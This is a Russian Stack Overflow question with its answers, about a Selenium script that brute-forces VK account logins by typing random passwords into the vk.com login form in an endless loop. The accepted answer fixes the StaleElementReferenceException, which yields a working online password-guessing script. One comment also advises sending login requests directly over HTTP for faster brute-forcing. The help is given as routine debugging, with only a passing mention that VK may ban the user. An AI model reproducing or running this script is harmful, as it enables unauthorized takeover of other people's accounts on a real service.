# Не работает программа после отправки данных: "StaleElementReferenceException: stale element reference: element is not attached to the page document"

Tags: python, вконтакте, selenium

```
length = randint(6,20)
wrong = []
symbols=["1","2","3","4","5","6","7","8","9","0","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"]
password = str()
LoginInput = input("Enter login/")
driver = webdriver.Chrome()
driver.get("https://vk.com/login?m=1&email=" + LoginInput)
login = driver.find_element_by_name("email")
passw = driver.find_element_by_id("pass")
logbut = driver.find_element_by_id("login_button")
run = True
while run:
#for i in range(3):
    for i in range(length):
        password+=random.choice(symbols)
    #print(password)
    passw.send_keys(password)
    logbut.click()

    password = str("")
    length = randint(1,20)
```

> Цитата

После первой отправки программа прекращает работать(все библиотеки есть, проект делаю в ознакомительных целях):

```
check_response raise exception_class(message, screen, stacktrace) selenium.common.exceptions.StaleElementReferenceException: Message: stale element reference: element is not attached to the page document (Session info: chrome=80.0.3987.149)
```

Comment: У вас бесконечный цикл без задержек, так не нужно делать. В итоге, ваш скрипт зависнет (и возможно комп), будет куча запросов в вк и тот введет капчу и, возможно, временно забанит за брутфорс

Comment: Спасибо за ответ! Но программа всё равно не работает(я указал 0.75)

Comment: Для селениума (по сути браузера) я бы увеличил задержку, либо добавил код, что будет проверять что форма отправки доступна, потому что стоит вк при отправке отправить редирект и ваш код с `logbut.click()` потеряет смысл. А если хотите брутфорсить, то нужно осваивать отправку запроса с авторизацией напрямую (`http post request`). Для начала, добавьте задержку в 10 секунд и смотрите на поведение окна браузера (оно же должно было открыться в `driver = webdriver.Chrome()`), скорее всего на этом этапе увидите, что что-то идет не так

Comment: Спасибо за ответ!Я поставил задержку 10 секунд, но программа всё равно не работает, я думаю может просто обновить веб драйвер?

Comment: Опишите подробнее. Не работает это падает? Или не вводит в форму сайта?

Comment: Не вводит в форму после первого раза(то есть один раз вводит, а в консоль выводит ошибки

Comment: Если есть ошибки, то добавляйте их в вопрос. Трасса стека

Comment: Traceback (most recent call last):
  File "Brootforce.py", line 47, in <module>
    passw.send_keys(password)
  File "C:\Users\Артём\AppData\Local\Programs\Python\Python37-32\lib\site-packages\selenium\webdriver\remote\webelement.py", line 479, in send_keys
    'value': keys_to_typing(value)})
  File "C:\Users\Артём\AppData\Local\Programs\Python\Python37-32\lib\site-packages\selenium\webdriver\remote\webelement.py", line 633, in _execute
    return self._parent.execute(command, params)

Comment: File "C:\Users\Артём\AppData\Local\Programs\Python\Python37-32\lib\site-packages\selenium\webdriver\remote\webdriver.py", line 321, in execute
    self.error_handler.check_response(response)
  File "C:\Users\Артём\AppData\Local\Programs\Python\Python37-32\lib\site-packages\selenium\webdriver\remote\errorhandler.py", line 242, in check_response
    raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.StaleElementReferenceException: Message: stale element reference: element is not attached to the page document
  (Session info: chrome=80.0.3987.149)

Comment: В следующий раз добавляйте в сам вопрос (я об этом выше явно писал), комментарии не для этого нужны. А насчет ошибки, теперь стало понятно, думаю знаю что вам предложить

Comment: Спасибо, буду добавлять ошибки. А что насчёт решения?

Answer (score 1, accepted):

Попробуйте заново элементы искать после загрузки. Т.к. при клике на отправку, новая страница будет загружена, а ссылки на элементы предыдущей страницы будут потеряны, думаю поэтому и возникает ошибка:

> element is not attached to the page document

Пример:

```
import string
import time
...

symbols = string.ascii_letters + string.digits

email = input("Enter login: ")
driver = webdriver.Chrome()
driver.get("https://vk.com/login?m=1&email=" + email)

run = True
while run:
    login = driver.find_element_by_name("email")
    passw = driver.find_element_by_id("pass")
    logbut = driver.find_element_by_id("login_button")

    length = randint(1, 20)
    password = ''.join(random.choice(symbols) for i in range(length))
    #print(password)
    passw.send_keys(password)
    logbut.click()

    time.sleep(10)
```

Comment: Огромное спасибо, буду фиксить!

Comment: @GFX, [чтобы поблагодарить автора ответа, проголосуйте за ответ или отметьте его как решение](https://ru.stackoverflow.com/help/someone-answers) :)